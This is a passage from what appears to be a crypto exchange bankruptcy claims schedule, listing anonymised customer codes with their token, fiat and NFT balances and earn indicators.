| 07322318 | | BRZ[1], CUSDT[2], DOGE[5], NFT (332921791912694693/Cold & Sunny #392)[1], NFT (380006129107474760/Bahrain Ticket Stub #668)[1], NFT (392547538013771192/Barcelona Ticket Stub #1878)[1], NFT (451301118413331118/FTX - Off The Grid Miami #6042)[1], NFT (529549576947542630/Founding Frens Lawyer #611)[1], SHIB[2], SOL[.30506351], USD[0.00], USDT[.018448] | Yes | |
| 07322322 | | USD[10.00] | | |
| 07322323 | | USD[10.00] | | |
| 07322325 | | ETH[0], SOL[0] | | |
| 07322326 | | CUSDT[1], GRT[5.49358435], USD[0.00] | | |
| 07322327 | | BTC[0], DOGE[.024], USD[3.08] | | |
| 07322329 | | CUSDT[1], USD[0.01] | | |
| 07322331 | | USD[10.00] | | |
| 07322333 | | BTC[0], ETH[0], LTC[.002893], NFT (422854642817249842/Humpty Dumpty #259)[1], NFT (476169348101015382/Jack-o-Lantern Nana)[1], USD[0.00] | | |
| 07322334 | | USD[10.00] | | |
| 07322335 | | USD[10.00] | | |
| 07322336 | | CUSDT[4], ETH[0], KSHIB[3111.90896400], LINK[12.77207294], SHIB[2508034.13338693], SOL[0.88033379], TRX[1], USD[0.00], USDT[1.07682604] | Yes | |
| 07322340 | | USD[10.00] | | |
| 07322341 | | USD[10.00] | | |
| 07322343 | | USD[10.00] | | |
| 07322344 | | CUSDT[2], TRX[2], USD[0.00] | | |
| 07322347 | | TRX[1], USD[0.00] | | |
| 07322348 | | BRZ[1.00085579], CUSDT[1], GRT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07322349 | | BAT[3.26589731], BRZ[4], CUSDT[2], DOGE[1], GRT[3.16275471], TRX[3], USD[0.00], USDT[1.08721497] | Yes | |
| 07322352 | | USD[10.00] | | |
| 07322353 | | USD[10.00] | | |
| 07322354 | | USD[10.00] | | |
| 07322355 | | USD[10.00] | | |
| 07322356 | | BRZ[2], KSHIB[3289.55119389], SHIB[612777.8621853], TRX[2], USD[0.00] | Yes | |
| 07322357 | | BF_POINT[100], CUSDT[1], USD[0.00] | | |
| 07322359 | | USD[10.00] | | |
| 07322360 | | GRT[9.80222357], TRX[1], USD[0.00] | | |
| 07322361 | | CUSDT[1], DOGE[4], ETHW[.6212085], GRT[88.29896637], SHIB[12], TRX[4], USD[4.07], USDT[0.00242372] | Yes | |
| 07322363 | | USD[10.00] | | |
| 07322364 | | USD[10.00] | | |
| 07322365 | | USD[10.00] | | |
| 07322367 | | BAT[1.0165555], BRZ[0.00000051], BTC[0], DAI[0], DOGE[1], ETH[0], GRT[1.00498957], LTC[0], SOL[.00289106], SUSHI[0], TRX[1], UNI[0], USD[0.00], USDT[0.00000004] | Yes | |
| 07322369 | | BTC[0], ETH[0], ETHW[0], LTC[20], UNI[0], USD[0.00], USDT[0.00000061] | | |
| 07322370 | | CUSDT[1], DOGE[108998.34559296], GRT[2], TRX[1], USD[10.00] | | |
| 07322371 | | USD[11.11] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07322374 | | USD[10.00] | | |
| 07322375 | | CUSDT[1], USD[0.00] | Yes | |
| 07322377 | | ETH[0], SOL[0], USD[0.00] | | |
| 07322378 | | USD[10.00] | | |
| 07322379 | | CUSDT[1], DOGE[867.12841298], TRX[3], USD[358.63], USDT[0] | Yes | |
| 07322381 | | USD[10.00] | | |
| 07322382 | | BTC[.000544], SHIB[1], USD[0.00] | Yes | |
| 07322383 | | USD[10.00] | | |
| 07322384 | | USD[10.00] | | |
| 07322385 | | USD[10.00] | | |
| 07322386 | | BTC[0], USD[0.05], USDT[0.00005384] | | |
| 07322387 | | DOGE[1], SOL[83.17454], USD[1275.61] | | |
| 07322389 | | USD[10.00] | | |
| 07322390 | | BAT[11.99490619], USD[0.00] | | |
| 07322391 | | DOGE[461.87509344], ETH[.00474124], ETHW[.00468652], USD[0.00] | Yes | |
| 07322392 | | USD[10.00] | | |
| 07322394 | | BAT[0], BCH[0.00000917], BRZ[0], BTC[0], DOGE[3], GRT[0.00302024], LINK[0], LTC[0], NFT (462067035179306759/Founding Frens Investor #773)[1], NFT (462956871708294599/Saudi Arabia Ticket Stub #2475)[1], NFT (574084308969533371/Barcelona Ticket Stub #731)[1], SHIB[1], SOL[0], SUSHI[0], TRX[7], USD[0.00], USDT[0] | Yes | |
| 07322395 | | USD[0.00] | Yes | |
| 07322396 | | SHIB[1], USD[0.00] | Yes | |
| 07322398 | | USD[10.00] | | |
| 07322401 | | GRT[4.58660664], USD[0.00] | | |
| 07322403 | | USD[10.00] | | |
| 07322404 | | DOGE[1], TRX[270.38795805], UNI[0], USD[0.00] | Yes | |
| 07322408 | | BTC[.00094397], USD[0.00] | Yes | |
| 07322409 | | BTC[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07322410 | | DOGE[1], USD[0.00] | | |
| 07322411 | | USD[10.00] | | |
| 07322413 | | CUSDT[5], DOGE[1], ETH[0], TRX[4], USD[0.00], USDT[1] | | |
| 07322414 | | USD[10.00] | | |
| 07322418 | | USD[10.00] | | |
| 07322419 | | USD[10.00] | | |
| 07322422 | | CUSDT[5], DOGE[459.33708149], SUSHI[9.07295899], TRX[4], USD[0.00] | Yes | |
| 07322424 | | USD[10.00] | | |
| 07322426 | | USD[10.00] | | |
| 07322427 | | BRZ[1], LINK[.37431822], USD[0.00] | | |
| 07322428 | | USD[10.00] | | |
| 07322429 | | DOGE[1], USD[0.00] | Yes | |
| 07322430 | | DOGE[0], SUSHI[0], TRX[2], USD[0.00] | | |
| 07322431 | | ETH[0], USD[0.01] | | |
| 07322433 | | SHIB[23786619.95943934], USD[0.00] | | |
| 07322434 | | BTC[0], CUSDT[2], DOGE[0], USD[11.00] | Yes | |
| 07322435 | | BAT[2.12920698], BRZ[4], CUSDT[12], DOGE[7.372147], GRT[1.00498957], SUSHI[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07322437 | | DOGE[1], GRT[0], TRX[2], USD[0.00] | | |
| 07322438 | | CUSDT[6], TRX[1], USD[0.00] | | |
| 07322439 | | USD[10.00] | | |
| 07322441 | | CUSDT[1], ETH[0.00000001], ETHW[0.00000001], TRX[0], USD[0.00] | | |
| 07322447 | | USD[10.00] | | |
| 07322448 | | BRZ[1], CUSDT[5], DOGE[499.99999609], SHIB[1], TRX[4], USD[0.01] | | |
| 07322449 | | USD[0.00], USDT[0] | | |
| 07322451 | | DOGE[2.00002926], USD[0.01] | | |
| 07322452 | | DOGE[13303.58098242], USD[1354.07] | | |
| 07322454 | | CUSDT[1], DOGE[1], GRT[19.02442376], USD[0.00] | | |
| 07322460 | | USD[10.00] | | |
| 07322462 | | USD[10.00] | | |
| 07322463 | | BTC[.02369237], CUSDT[1], DOGE[8.37819172], KSHIB[1395.12579702], LINK[4.40126498], LTC[.68583862], MATIC[34.65124626], SHIB[1019956.64090135], SOL[.60683747], SUSHI[58.16815016], UNI[1.31935971], USD[0.05], USDT[0] | Yes | |
| 07322464 | | USD[10.00] | | |
| 07322468 | | BCH[0], BTC[0], DOGE[0], LTC[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07322469 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07322471 | | DOGE[.112], USD[0.01] | | |
| 07322472 | | CUSDT[4], DOGE[1283.26568032], SHIB[727332.98428842], TRX[2], USD[11.96] | Yes | |
| 07322474 | | DOGE[1], USD[24.96] | | |
| 07322475 | | TRX[59.53677294], USD[0.00] | | |
| 07322477 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07322478 | | CUSDT[1], DOGE[6], USD[0.00], USDT[0] | | |
| 07322479 | | BTC[0], DOGE[0], ETH[0.00000001], SUSHI[0.01143385], USD[0.00], USDT[0] | Yes | |
| 07322480 | | CUSDT[2], DOGE[356.4194354], SHIB[212071.71067017], SUSHI[1.06378372], TRX[172.43764673], UNI[1.05102503], USD[50616.66] | Yes | |
| 07322481 | | BTC[.00178859], CUSDT[1], GRT[1.00298163], SHIB[.00000001], TRX[178.07472108], USD[0.00] | Yes | |
| 07322482 | | BTC[0], CUSDT[4], DOGE[0], GRT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07322483 | | DOGE[1], USD[0.00] | | |
| 07322484 | | DOGE[0], ETH[.01420302], ETHW[.01420302], TRX[1.15042547], USD[0.00] | | |
| 07322485 | | USD[10.00] | | |
| 07322486 | | BTC[.00017349], USD[0.00] | | |
| 07322487 | | USD[0.00] | | |
| 07322488 | | USD[10.00] | | |
| 07322489 | | BTC[0.00078883], USD[0.05] | | |
| 07322490 | | DOGE[29724.005], ETH[.000068], ETHW[.000068], SHIB[28400000], USD[0.00] | | |
| 07322492 | | DOGE[0] | | |
| 07322493 | | USD[10.00] | | |
| 07322495 | | BAT[1], BCH[.95579527], BRZ[1], BTC[.00220619], DOGE[3913.92474336], ETH[2.48577005], ETHW[2.22437813], SHIB[13], TRX[2], USD[0.00], USDT[2.03060371] | Yes | |
| 07322497 | | CUSDT[3], TRX[2], USD[68.56] | | |
| 07322498 | | USD[10.00] | | |
| 07322499 | | BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.01], USDT[0], YFI[0] | | |
| 07322500 | | AVAX[.00004437], CUSDT[3], LINK[.00010291], MATIC[.00106266], SHIB[39], SOL[.00006585], SUSHI[.00030106], USD[0.01], USDT[0] | Yes | |
| 07322501 | | DOGE[241.66136416], SHIB[1], USD[30.00] | | |
| 07322503 | | BRZ[1], TRX[2], USD[478.43] | | |
| 07322504 | | ETH[.00552175], ETHW[.00552175], USD[0.00] | | |
| 07322507 | | USD[10.00] | | |
| 07322508 | | USD[10.00] | | |
| 07322509 | | BAT[0], BRZ[0], BTC[0], DOGE[0], GRT[0], LTC[0], UNI[0], USD[0.00], USDT[0] | | |
| 07322510 | | DOGE[0] | | |
| 07322511 | | USD[10.00] | | |
| 07322512 | | USD[0.61] | | |
| 07322513 | | BAT[0], BCH[0], BTC[0.00188545], DOGE[0], LTC[0], SHIB[2], SOL[0], TRX[865.66697045], USD[-22.00], USDT[0] | Yes | |
| 07322514 | | USD[10.00] | | |
| 07322515 | | CUSDT[2], DOGE[1], SHIB[3521592.04637181], TRX[4339.42603932], USD[0.01] | Yes | |
| 07322518 | | CUSDT[1], USD[0.01] | | |
| 07322519 | | DOGE[1.00003874], USD[91.99] | | |
| 07322520 | | CUSDT[6], DOGE[0], EUR[0.00], USD[0.00] | Yes | |
| 07322522 | | USD[10.00] | | |
| 07322523 | | BRZ[1], BTC[.05866662], USD[11.77], USDT[0.00024480] | Yes | |
| 07322524 | | BRZ[2], CUSDT[2], TRX[2], USD[0.00], USDT[0.00000001] | | |
| 07322525 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07322526 | | DOGE[0], SOL[0], USD[0.00] | | |
| 07322530 | | DOGE[174.0472869], USD[10.00] | | |
| 07322531 | | BRZ[1], DAI[.01819793], DOGE[1], USD[0.66], USDT[0] | Yes | |
| 07322532 | | USD[10.00] | | |
| 07322533 | | USD[10.00] | | |
| 07322534 | | BF_POINT[100], BRZ[2.00016025], BTC[0], DOGE[2], ETH[0], ETHW[.00003735], GRT[8.01896794], KSHIB[0], MATIC[0], SHIB[11], SOL[0], TRX[0.06643146], USD[0.00], USDT[0.46197014], YFI[0] | Yes | |
| 07322536 | | USD[10.00] | | |
| 07322538 | | BAT[1], CUSDT[1], TRX[3], USD[118.05] | | |
| 07322542 | | USD[0.01] | | |
| 07322543 | | BAT[0], USD[0.00] | | |
| 07322544 | | NFT (519141582578607001/Miami Ticket Stub #155)[1], USD[114.26] | Yes | |
| 07322545 | | BTC[.00000003], USD[0.00] | Yes | |
| 07322548 | | ETHW[0.99649717], USD[0.00] | Yes | |
| 07322549 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07322550 | | BAT[0], CUSDT[7], DOGE[0], ETH[0], LINK[0], TRX[2], USD[0.00] | | |
| 07322551 | | BTC[0], DOGE[.488], USDT[.052328] | | |
| 07322554 | | BTC[0], DOGE[.00008526], LTC[0.00337026], USD[0.00] | | |
| 07322555 | | USD[10.00] | | |
| 07322557 | | BRZ[0], CUSDT[0], DOGE[0], ETH[0], ETHW[0], SOL[0], USD[0.01], USDT[0] | | |
| 07322560 | | USD[10.00] | | |
| 07322561 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07322562 | | USD[10.00] | | |
| 07322563 | | ETH[.00556391], ETHW[.00556391], USD[0.00] | | |
| 07322564 | | USD[10.00] | | |
| 07322565 | | USD[10.00] | | |
| 07322566 | | DOGE[14352.193], USD[0.37] | | |
| 07322567 | | CUSDT[471.89183978], DOGE[439.00065673], USD[0.00] | | |
| 07322568 | | DOGE[31.45160874], USD[0.00] | | |
| 07322569 | | GRT[4.48144446], USD[0.00] | | |
| 07322570 | | DOGE[1], GRT[6.09603421], USD[0.00] | | |
| 07322571 | | BTC[.0001972], USD[0.00] | | |
| 07322573 | | USD[38.48] | | |
| 07322574 | | USD[10.00] | | |
| 07322575 | | CUSDT[2], DOGE[1.00006924], SHIB[937686.38410953], USD[0.00] | Yes | |
| 07322576 | | USD[10.00] | | |
| 07322577 | | USD[10.00] | | |
| 07322580 | | USD[10.00] | | |
| 07322582 | | DOGE[130.84743121], USD[0.00], USDT[0] | | |
| 07322583 | | USD[0.00] | | |
| 07322584 | | CUSDT[5], DOGE[1], GRT[2], TRX[2], USD[0.00] | | |
| 07322585 | | USD[10.00] | | |
| 07322586 | | BTC[.00132419], CUSDT[1], DOGE[1214.88573317], ETH[.04843854], ETHW[.04843854], TRX[813.44576712], USD[0.00] | | |
| 07322587 | | ETH[0], LINK[0.07246256], LTC[.00272], TRX[.592], USD[0.14] | | |
| 07322589 | | CUSDT[2], DOGE[1081.12986232], TRX[1], USD[11.17] | | |
| 07322590 | | BTC[0], DOGE[0], ETH[0], USD[0.01] | | |
| 07322591 | | USD[10.00] | | |
| 07322592 | | DOGE[32.30992298], USD[0.00] | | |
| 07322593 | | CUSDT[5], TRX[1], USD[24.27] | | |
| 07322594 | | USD[10.00] | | |
| 07322595 | | DOGE[17988], LTC[9.99], SOL[40.959], SUSHI[99.9], USD[247.19] | | |
| 07322597 | | BRZ[1], BTC[.00021802], CUSDT[3], SOL[0], TRX[1], USD[0.01], USDT[1.11043116] | Yes | |
| 07322598 | | DOGE[194.64102647], USD[0.00] | | |
| 07322600 | | USD[10.00] | | |
| 07322602 | | BAT[1], BRZ[7.13240924], BTC[.00503381], CUSDT[8], DOGE[22.76034219], GRT[4], SHIB[2], SUSHI[2.07708672], TRX[11.011735], UNI[1.02120144], USD[0.01], USDT[0] | Yes | |
| 07322603 | | BTC[0.00008066], ETHW[1.1703356], SOL[.0038], USD[1.61], USDT[1.57698052] | | |
| 07322604 | | USD[10.00] | | |
| 07322606 | | CUSDT[8107.51743322], DOGE[10530.12128824], USD[0.22] | | |
| 07322607 | | USD[10.00] | | |
| 07322609 | | USD[10.00] | | |
| 07322610 | | BTC[.00020636], USD[0.00] | | |
| 07322611 | | BAT[3], BRZ[5.00000001], BTC[0], CUSDT[3], DOGE[15.29197485], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], TRX[2], USD[0.00], USDT[1] | | |
| 07322613 | | BRZ[1], BTC[0.00001114], DOGE[506.47303614], USD[0.00] | | |
| 07322615 | | DOGE[.832], USD[1.48] | | |
| 07322616 | | DOGE[290.4099575], TRX[1], USD[0.00] | | |
| 07322617 | | USD[10.00] | | |
| 07322619 | | BRZ[2], BTC[0], CUSDT[1], DOGE[1118.15201731], ETH[0.00000107], ETHW[0.00000107], LINK[.00120769], USD[0.00] | Yes | |
| 07322621 | | USD[0.00], USDT[0.00000055] | | |
| 07322622 | | USD[10.84] | Yes | |
| 07322623 | | USD[10.00] | | |
| 07322626 | | USD[0.01] | | |
| 07322627 | | USD[10.00] | | |
| 07322628 | | BTC[.00031284], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07322629 | | AAVE[1.00298524], BTC[.00175884], DOGE[256.50195037], ETH[.03078546], ETHW[.03078546], LTC[.11333631], SOL[.43513716], USD[2.36] | | |
| 07322630 | | NFT (467173445504958740/Humpty Dumpty #277)[1] | | |
| 07322631 | | TRX[0], USD[0.00], USDT[.00208257] | | |
| 07322632 | | DOGE[1], USD[33.91] | | |
| 07322634 | | BAT[13.51010893], BTC[.00020666], DOGE[40.69146225], USD[0.00], USDT[0.00000001] | Yes | |
| 07322635 | | BAT[1.01655549], USD[0.01] | Yes | |
| 07322636 | | DOGE[912.73645389], TRX[1], USD[0.00] | | |
| 07322638 | | GRT[7.64963221], USD[0.00] | | |
| 07322640 | | BAT[1.01655549], BRZ[1], CUSDT[1], DOGE[1], ETH[.00000186], ETHW[0.20312039], TRX[993.20360778], USD[308.74] | Yes | |
| 07322641 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07322642 | | USD[10.00] | | |
| 07322643 | | USD[10.00] | | |
| 07322644 | | BRZ[1], BTC[.02184922], CUSDT[9], DOGE[8.48530824], ETH[.75170567], ETHW[.75139011], TRX[4], USD[0.08], USDT[1.10575594] | Yes | |
| 07322645 | | USD[10.00] | | |
| 07322649 | | DOGE[0], ETH[.00038335], ETHW[.00038335], USD[0.00] | | |
| 07322650 | | USD[10.00] | | |
| 07322651 | | USD[10.00] | | |
| 07322652 | | BRZ[2], CUSDT[1], DOGE[.00049194], USD[0.01] | | |
| 07322653 | | BRZ[1], BTC[.00133523], CUSDT[1], DOGE[.00002848], NFT (547324726531111242/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #46)[1], NFT (552914561906245260/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #52)[1], USD[162.17] | | |
| 07322654 | | DOGE[145.22317433], USD[0.00] | | |
| 07322655 | | USD[11.09] | Yes | |
| 07322656 | | USD[10.00] | | |
| 07322657 | | USD[0.00] | | |
| 07322658 | | BTC[0], ETHW[0], NFT (293342836083697267/Entrance Voucher #1915)[1], NFT (305799195712832122/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #10)[1], NFT (325269079644387827/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #10)[1], NFT (326197523038955438/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #13)[1], NFT (335037868276443472/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #2)[1], NFT (389162647841250858/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #12)[1], NFT (394989032659839658/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #10)[1], NFT (413331388432735356/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #13)[1], NFT (423009962290145345/Boneworld #2322)[1], NFT (466591246703925783/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #9)[1], NFT (474987596386548881/Imola Ticket Stub #908)[1], NFT (477603740945457929/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #9)[1], NFT (478642293742191103/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #2)[1], NFT (518697364379423877/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #8)[1], NFT (547792959091464425/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #17)[1], NFT (575938540555399195/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #11)[1], USD[1.27], USDT[0] | Yes | |
| 07322659 | | CUSDT[1], DOGE[0], ETH[.00797575], ETHW[.00787999], SUSHI[0], USD[0.00] | Yes | |
| 07322661 | | USD[10.00] | | |
| 07322662 | | USD[0.56] | | |
| 07322666 | | USD[10.00] | | |
| 07322667 | | CUSDT[1], ETH[.00000001], ETHW[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07322670 | | TRX[1], USD[0.48] | | |
| 07322671 | | GRT[3.39485584], USD[0.00] | | |
| 07322672 | | NFT (537132367551183702/FTX - Off The Grid Miami #503)[1], USD[10.00] | | |
| 07322673 | | GRT[4.71969181], USD[0.00] | Yes | |
| 07322674 | | LTC[.04716527], USD[0.00] | | |
| 07322675 | | BTC[0.00000728], CUSDT[2], DOGE[1], TRX[2], USD[0.00] | | |
| 07322676 | | USD[10.00] | | |
| 07322677 | | BTC[0.00001142], ETHW[39.45449631], LINK[470.84073412], UNI[.01143222], USD[0.00], USDT[0.00000084] | Yes | |
| 07322678 | | BTC[0], CUSDT[2], DOGE[2], TRX[2], USD[38.85] | | |
| 07322679 | | ETHW[.01194297], SOL[0], USD[0.00] | | |
| 07322681 | | USD[10.00] | | |
| 07322682 | | USD[10.00] | | |
| 07322686 | | CUSDT[467.17510891], USD[0.00] | | |
| 07322688 | | BAT[1.01299018], BRZ[6.16371694], BTC[.26423169], CUSDT[45.00222151], DOGE[10120.73137131], ETH[6.14195433], ETHW[5.45460699], LTC[9.9640307], SHIB[26], TRX[21.82064497], USD[0.00] | Yes | |
| 07322690 | | USD[10.00] | | |
| 07322691 | | CUSDT[1], DOGE[0], SHIB[1.02483429], SOL[.01986949], USD[0.00] | Yes | |
| 07322693 | | USD[10.00] | | |
| 07322694 | | USD[10.00] | | |
| 07322696 | | USD[10.00] | | |
| 07322697 | | USD[10.00] | | |
| 07322698 | | TRX[1], USD[0.00] | Yes | |
| 07322699 | | CUSDT[1], DOGE[5], TRX[2], USD[0.00], USDT[0] | | |
| 07322700 | | | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07322701 | | CUSDT[6], TRX[74.1356498], USD[0.55], USDT[1] | | |
| 07322703 | | DOGE[1138.98461348], USD[0.01] | | |
| 07322707 | | BAT[0], BRZ[0], BTC[0], CUSDT[2], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[0], TRX[0], USD[0.00] | | |
| 07322708 | | SUSHI[.59278585], USD[0.00] | | |
| 07322709 | | USD[10.00] | | |
| 07322712 | | DOGE[37.10253263], USD[0.00] | Yes | |
| 07322713 | | BTC[.00020436], USD[0.00] | Yes | |
| 07322714 | | USD[10.00] | | |
| 07322717 | | SOL[1.06402357], USD[0.00] | | |
| 07322718 | | USD[10.00] | | |
| 07322721 | | USD[0.00] | | |
| 07322722 | | USD[10.00] | | |
| 07322724 | | DOGE[1], USD[0.00] | | |
| 07322725 | | USD[10.00] | | |
| 07322727 | | USD[2.41] | | |
| 07322728 | | USD[10.00] | | |
| 07322729 | | DOGE[3505.05498002], USD[0.00] | | |
| 07322730 | | USD[10.00] | | |
| 07322731 | | USD[10.00] | | |
| 07322732 | | BRZ[2], CUSDT[29], DOGE[623.07220522], GRT[1], SHIB[55], SOL[0.00003593], SUSHI[47.532735], TRX[7], USD[0.00], USDT[0] | Yes | |
| 07322736 | | TRX[.000003], USDT[.001832] | | |
| 07322737 | | USD[10.00] | | |
| 07322738 | | BRZ[1], CUSDT[2], TRX[4], USD[0.00] | Yes | |
| 07322739 | | BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], TRX[0], USD[0.00] | | |
| 07322740 | | GRT[1.00498957], USD[0.00] | Yes | |
| 07322743 | | DOGE[.573], SHIB[699300], TRX[.226], USD[81.01], USDT[.00607301] | | |
| 07322746 | | CUSDT[6], DOGE[3], TRX[3], USD[0.00] | Yes | |
| 07322747 | | CUSDT[2], DOGE[2101.2118985], USD[0.00] | | |
| 07322749 | | USD[10.00] | | |
| 07322750 | | CUSDT[2], USD[0.00] | | |
| 07322751 | | USD[0.00] | | |
| 07322754 | | USD[0.03] | | |
| 07322755 | | USD[10.00] | | |
| 07322756 | | TRX[135.63119707], USD[0.00] | | |
| 07322757 | | BRZ[1], CUSDT[4], USD[0.01] | | |
| 07322760 | | BTC[0], ETH[.00018797], ETHW[.00018797], USD[0.00], USDT[0.01302450] | | |
| 07322761 | | AAVE[0], AUD[0.00], BCH[0], BF_POINT[200], CUSDT[3], DAI[0], DOGE[361.64412497], ETH[0], ETHW[0], LTC[0], MATIC[0], MKR[0], PAXG[0.00010314], TRX[2], UNI[0], USD[0.01] | Yes | |
| 07322764 | | CUSDT[1], DOGE[2], ETHW[.23645529], NFT [348194473772711703/FTX - Off The Grid Miami #1898][1], NFT [385940647905568593/Entrance Voucher #2074][1], NFT [539003562576270719/Monocle #58][1], SHIB[1], USD[420.45] | Yes | |
| 07322766 | | DOGE[1000.44522238], TRX[1], USD[0.01], USDT[1] | | |
| 07322767 | | USD[10.00] | | |
| 07322768 | | USD[10.00] | | |
| 07322769 | | USD[0.00] | | |
| 07322771 | | DOGE[2], GRT[0], MATIC[158.64177052], SHIB[0], SUSHI[0], USD[0.00] | Yes | |
| 07322772 | | DOGE[0], ETH[0], ETHW[0], LINK[0], USD[0.00] | | |
| 07322773 | | BTC[.00359945], UNI[11.2055], USD[4.65], USDT[0] | | |
| 07322774 | | USD[10.00] | | |
| 07322775 | | TRX[122.12039523], USD[0.00] | Yes | |
| 07322776 | | BRZ[0], CUSDT[3], DOGE[1], TRX[0], USD[0.01], USDT[0.00004516] | | |
| 07322777 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07322778 | | USD[10.00] | | |
| 07322783 | | USD[0.01] | | |
| 07322787 | | USD[10.00] | | |
| 07322789 | | BAT[1.0165555], DOGE[1203.86927262], TRX[1505.17315724], USD[0.00], USDT[0.00000545] | Yes | |
| 07322792 | | DOGE[0], TRX[2], USD[10.00] | | |
| 07322793 | | USD[10.00] | | |
| 07322794 | | USDT[226.941395] | | |
| 07322795 | | USD[10.00] | | |
| 07322797 | | USD[20.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07322798 | | USD[10.00] | | |
| 07322799 | | USD[10.00] | | |
| 07322800 | | DOGE[2497.5], TRX[1298.7], USD[0.10] | | |
| 07322801 | | BTC[.00152327], CUSDT[2], DOGE[1074.2348956], NFT (43413948877643963Coachella x FTX Weekend 2 #17349)[1], TRX[2], USD[25.00] | | |
| 07322802 | | TRX[1], USD[0.00] | | |
| 07322803 | | DOGE[.607], LTC[.00816], TRX[.652], USD[59.40] | | |
| 07322804 | | CUSDT[1], SUSHI[3.71395092], USD[0.00] | Yes | |
| 07322806 | | BRZ[.64170893], BTC[.00000001], ETH[0], USD[-0.05] | | |
| 07322808 | | BTC[.00173955], DOGE[1.07786259], TRX[2], USD[0.00], USDT[1] | | |
| 07322809 | | USD[10.00] | | |
| 07322810 | | BTC[.00281942], CUSDT[1], LTC[1.12705668], TRX[17632.96993654], USD[0.00] | Yes | |
| 07322812 | | USD[10.00] | | |
| 07322814 | | USD[10.00] | | |
| 07322816 | | DOGE[15.72296685], USD[0.00] | | |
| 07322817 | | DOGE[.0004656], TRX[1], USD[0.00] | | |
| 07322818 | | USD[10.00] | | |
| 07322819 | | USD[10.00] | | |
| 07322821 | | CUSDT[6], DOGE[10.68226366], TRX[3], USD[0.00] | Yes | |
| 07322822 | | USD[10.00] | | |
| 07322823 | | CUSDT[1], DOGE[1262.52051306], TRX[1], USD[0.00] | | |
| 07322824 | | BRZ[1], DOGE[.00001662], USD[0.01] | | |
| 07322825 | | BTC[.0000502], USD[0.02] | | |
| 07322826 | | USD[10.00] | | |
| 07322828 | | USD[10.40] | Yes | |
| 07322829 | | DOGE[.97979040], USD[0.01], USDT[0] | | |
| 07322831 | | USD[10.00] | | |
| 07322833 | | CUSDT[3], DOGE[3], LINK[.02452357], TRX[2], USD[15.28], USDT[0.00000001] | | |
| 07322835 | | USD[10.00] | | |
| 07322837 | | USD[10.00] | | |
| 07322841 | | USD[10.00] | | |
| 07322843 | | DOGE[.914], USD[0.12] | | |
| 07322846 | | DOGE[0], USD[0.04] | | |
| 07322847 | | USD[10.00] | | |
| 07322848 | | BRZ[4], BTC[.00094968], CUSDT[6], DOGE[47.84387609], ETH[.00973978], ETHW[.00973978], GRT[1], TRX[3], USD[0.66] | | |
| 07322849 | | USD[10.00] | | |
| 07322850 | | USD[13.29] | | |
| 07322851 | | BTC[.0041], ETH[.05600000], ETHW[.05600000], KSHIB[5894.21], USD[0.00] | | |
| 07322853 | | USD[10.00] | | |
| 07322855 | | CUSDT[1], USD[0.01] | | |
| 07322856 | | BRZ[1], CUSDT[1], DOGE[5646.48163284], TRX[2], USD[0.00] | | |
| 07322857 | | BAT[0], BTC[0], DOGE[0.14595613], USD[0.00] | | |
| 07322858 | | USD[10.00] | | |
| 07322860 | | USD[10.00] | | |
| 07322861 | | BAT[876.14197906], CUSDT[9], DOGE[10.60656767], ETHW[.33920367], TRX[3], USD[0.00] | Yes | |
| 07322863 | | ETH[0], SOL[0], TRX[.48], USD[0.58] | | |
| 07322864 | | CUSDT[.00155194], DOGE[2], SOL[.00000395], TRX[.08855411], USD[0.00], USDT[0] | Yes | |
